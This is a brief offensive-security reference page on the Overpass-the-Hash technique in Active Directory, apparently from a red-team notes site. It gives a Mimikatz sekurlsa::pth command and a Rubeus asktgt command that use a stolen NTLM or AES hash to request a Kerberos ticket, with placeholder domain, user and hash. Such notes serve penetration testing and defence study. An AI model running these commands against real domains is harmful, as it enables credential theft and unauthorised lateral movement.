Overpass The Hash

About

When Pass-The-Hash is mostly used to bypass regular login, then Overpass-The-Hash is using hash for requesting TGT from KDC.

Mimikatz

sekurlsa::pth /domain:corp.local /user:rio /ntlm:1293uo1uwfoi1hw081

Rubeus

Here we use asktgt module to request a TGT using hash and KDC.

Rubeus.exe asktgt /domain:corp.local /user:rio /aes256:1293uo1uwfoi1hw081 /nowrap
PreviousGolden TicketNextPass The Ticket

Last updated